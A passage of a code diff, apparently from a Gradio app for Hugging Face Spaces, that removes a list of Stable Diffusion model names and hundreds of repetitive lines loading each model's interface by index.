"Fictiverse/Stable_Diffusion_BalloonArt_Model", - "stablediffusionapi/bg-dream-irl", - "stablediffusionapi/bg-dream-model-b", #193 - "Rardilit/Ciffusion_v0.1", - "circulus/sd-anireal-2d-v2", - "circulus/sd-photoreal-v2.7", - "circulus/sd-photoreal-photo-v2", - "circulus/sd-anireal-2.5d-v2", - "circulus/sd-anireal-v2.5", - "circulus/sd-photoreal-semi-v2", - "circulus/sd-photoreal-real-v2", - "circulus/sd-photoreal-v2.5", - "circulus/sd-anireal-3d-v2", - "circulus/sd-anireal-v2.8", - "nitrosocke/classic-anim-diffusion", - "Conflictx/Complex-Lineart", #245 - "sayakpaul/da-vinci-sd-pokemon", - "nitrosocke/elden-ring-diffusion", - "digiplay/EtherBluMix_1", #07.11 - "digiplay/fantasticmix_v40_test", #261 - "theintuitiveye/FantasyMix", - "Fictiverse/Stable_Diffusion_FluidArt_Model", - "nitrosocke/Future-Diffusion", - "ItsJayQz/GTA5_Artwork_Diffusion", #205 - "digiplay/hellopure_v2.23", - "TheLastBen/hrrzg-style-768px", #246 - "nevernotsean/IllustratedPaperMini", #242 - "dallinmackay/JWST-Deep-Space-diffusion", - "prompthero/linkedin-diffusion", - "mann-e/mann-e_4_rev-0-1", #210 - "ItsJayQz/Marvel_WhatIf_Diffusion", #206 - "yuanbit/max-15-1e-6-1500", - "MyneFactory/MF-Base", #248 - "Fictiverse/Stable_Diffusion_Microscopic_model", #249 - "nitrosocke/mo-di-diffusion", - "luongphamit/NeverEnding-Dream2", #241 - "lambdalabs/sd-naruto-diffusers", #201 - "Vernon-2/output_test", - "Fictiverse/Stable_Diffusion_PaperCut_Model", - "bsuutari/path_to_saved_model", - "bsuutari/path_to_saved_model_rafa", - "digiplay/PlanetBumix_v1", - "lambdalabs/sd-pokemon-diffusers", #202 - "prompthero/poolsuite-diffusion", - "digiplay/RealismEngine_v1", - "nitrosocke/redshift-diffusion", - "nitrosocke/redshift-diffusion-768", - "nousr/robo-diffusion", - "digiplay/SDVN1-Real_v1", #255 - "nitrosocke/spider-verse-diffusion", - #"runwayml/stable-diffusion-v1-5", - "nicky007/stable-diffusion-logo-fine-tuned", - "stablediffusionapi/three-delicacy", #233 - "stablediffusionapi/three-delicacy-wonto", #234 - "naclbit/trinart_stable_diffusion_v2", - "dallinmackay/Tron-Legacy-diffusion", - "digiplay/unstableDiffusersYamerMIX_v3", - "dallinmackay/Van-Gogh-diffusion", - "ItsJayQz/Valorant_Diffusion", - "Fictiverse/Stable_Diffusion_VoxelArt_Model", #204 - "wavymulder/wavyfusion", - "Yntec/HassanRemix", - "Yntec/Reddit", - "Yntec/CinematicReality", - "CompVis/stable-diffusion-v1-3", #207 - "CompVis/stable-diffusion-v1-2", #208 - "CompVis/stable-diffusion-v1-1", #209 -] -current_model = models[0] - -text_gen1=gr.Interface.load("spaces/daspartho/prompt-extend") -#text_gen1=gr.Interface.load("spaces/Omnibus/MagicPrompt-Stable-Diffusion_link") - -models2=[ - gr.Interface.load(f"models/{models[0]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[1]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[2]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[3]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[4]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[5]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[6]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[7]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[8]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[9]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[10]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[11]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[12]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[13]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[14]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[15]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[16]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[17]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[18]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[19]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[20]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[21]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[22]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[23]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[24]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[25]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[26]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[27]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[28]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[29]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[30]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[31]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[32]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[33]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[34]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[35]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[36]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[37]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[38]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[39]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[40]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[41]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[42]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[43]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[44]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[45]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[46]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[47]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[48]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[49]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[50]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[51]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[52]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[53]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[54]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[55]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[56]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[57]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[58]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[59]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[60]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[61]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[62]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[63]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[64]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[65]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[66]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[67]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[68]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[69]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[70]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[71]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[72]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[73]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[74]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[75]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[76]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[77]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[78]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[79]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[80]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[81]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[82]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[83]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[84]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[85]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[86]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[87]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[88]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[89]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[90]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[91]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[92]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[93]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[94]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[95]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[96]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[97]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[98]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[99]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[100]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[101]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[102]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[103]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[104]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[105]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[106]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[107]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[108]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[109]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[110]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[111]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[112]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[113]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[114]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[115]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[116]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[117]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[118]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[119]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[120]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[121]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[122]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[123]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[124]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[125]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[126]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[127]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[128]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[129]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[130]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[131]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[132]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[133]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[134]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[135]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[136]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[137]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[138]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[139]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[140]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[141]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[142]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[143]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[144]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[145]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[146]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[147]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[148]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[149]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[150]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[151]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[152]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[153]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[154]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[155]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[156]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[157]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[158]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[159]}",live=True,preprocess=False), - - gr.Interface.load(f"models/{models[160]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[161]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[162]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[163]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[164]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[165]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[166]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[167]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[168]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[169]}",live=True,preprocess=False), - - gr.Interface.load(f"models/{models[170]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[171]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[172]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[173]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[174]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[175]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[176]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[177]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[178]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[179]}",live=True,preprocess=False), - - gr.Interface.load(f"models/{models[180]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[181]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[182]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[183]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[184]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[185]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[186]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[187]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[188]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[189]}",live=True,preprocess=False), - - gr.Interface.load(f"models/{models[190]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[191]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[192]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[193]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[194]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[195]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[196]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[197]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[198]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[199]}",live=True,preprocess=False), - - gr.Interface.load(f"models/{models[200]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[201]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[202]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[203]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[204]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[205]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[206]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[207]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[208]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[209]}",live=True,preprocess=False), - - gr.Interface.load(f"models/{models[210]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[211]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[212]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[213]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[214]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[215]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[216]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[217]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[218]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[219]}",live=True,preprocess=False), - - gr.Interface.load(f"models/{models[220]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[221]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[222]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[223]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[224]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[225]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[226]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[227]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[228]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[229]}",live=True,preprocess=False), - - gr.Interface.load(f"models/{models[230]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[231]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[232]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[233]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[234]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[235]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[236]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[237]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[238]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[239]}",live=True,preprocess=False), - - gr.Interface.load(f"models/{models[240]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[241]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[242]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[243]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[244]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[245]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[246]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[247]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[248]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[249]}",live=True,preprocess=False), - - gr.Interface.load(f"models/{models[250]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[251]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[252]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[253]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[254]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[255]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[256]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[257]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[258]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[259]}",live=True,preprocess=False), - - gr.Interface.load(f"models/{models[260]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[261]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[262]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[263]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[264]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[265]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[266]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[267]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[268]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[269]}",live=True,preprocess=False), - - gr.Interface.load(f"models/{models[270]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[271]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[272]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[273]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[274]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[275]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[276]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[277]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[278]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[279]}",live=True,preprocess=False), - - gr.Interface.load(f"models/{models[280]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[281]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[282]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[283]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[284]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[285]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[286]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[287]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[288]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[289]}",live=True,preprocess=False), - - gr.Interface.load(f"models/{models[290]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[291]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[292]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[293]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[294]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[295]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[296]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[297]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[298]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[299]}",live=True,preprocess=False), - - gr.Interface.load(f"models/{models[300]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[301]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[302]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[303]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[304]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[305]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[306]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[307]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[308]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[309]}",live=True,preprocess=False), - - gr.Interface.load(f"models/{models[310]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[311]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[312]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[313]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[314]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[315]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[316]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[317]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[318]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[319]}",live=True,preprocess=False), - - gr.Interface.load(f"models/{models[320]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[321]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[322]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[323]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[324]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[325]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[326]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[327]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[328]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[329]}",live=True,preprocess=False), - - gr.Interface.load(f"models/{models[330]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[331]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[332]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[333]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[334]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[335]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[336]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[337]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[338]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[339]}",live=True,preprocess=False), - - gr.Interface.load(f"models/{models[340]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[341]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[342]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[343]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[344]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[345]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[346]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[347]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[348]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[349]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[350]}",live=True,preprocess=False), - - gr.Interface.load(f"models/{models[351]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[352]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[353]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[354]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[355]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[356]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[357]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[358]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[359]}",live=True,preprocess=False), - - gr.Interface.load(f"models/{models[360]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[361]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[362]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[363]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[364]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[365]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[366]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[367]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[368]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[369]}",live=True,preprocess=False), - - gr.Interface.load(f"models/{models[370]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[371]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[372]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[373]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[374]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[375]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[376]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[377]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[378]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[379]}",live=True,preprocess=False), - - gr.Interface.load(f"models/{models[380]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[381]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[382]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[383]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[384]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[385]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[386]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[387]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[388]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[389]}",live=True,preprocess=False), - - gr.Interface.load(f"models/{models[390]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[391]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[392]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[393]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[394]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[395]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[396]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[397]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[398]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[399]}",live=True,preprocess=False), - - gr.Interface.load(f"models/{models[400]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[401]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[402]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[403]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[404]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[405]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[406]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[407]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[408]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[409]}",live=True,preprocess=False), - - gr.Interface.load(f"models/{models[410]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[411]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[412]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[413]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[414]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[415]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[416]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[417]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[418]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[419]}",live=True,preprocess=False), - - 